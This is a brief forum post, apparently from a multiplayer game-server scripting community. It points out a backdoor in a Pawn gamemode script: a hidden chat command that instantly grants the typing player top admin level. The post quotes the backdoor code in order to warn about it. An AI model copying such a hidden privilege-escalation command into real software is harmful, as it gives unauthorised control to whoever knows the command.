02.02.2015, 20:16
Quote:
|
There's a small backdoor in code - not sure if it was intentional or not.
Код:
if(strcmp(cmd, "/Fuckyouagains", true) == 0)
{
PlayerInfo[playerid][pAdmin] = 99999;
SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 99999 Admin");
SendClientMessage(playerid, COLOR_LIGHTBLUE, string);
return 1;
}
|


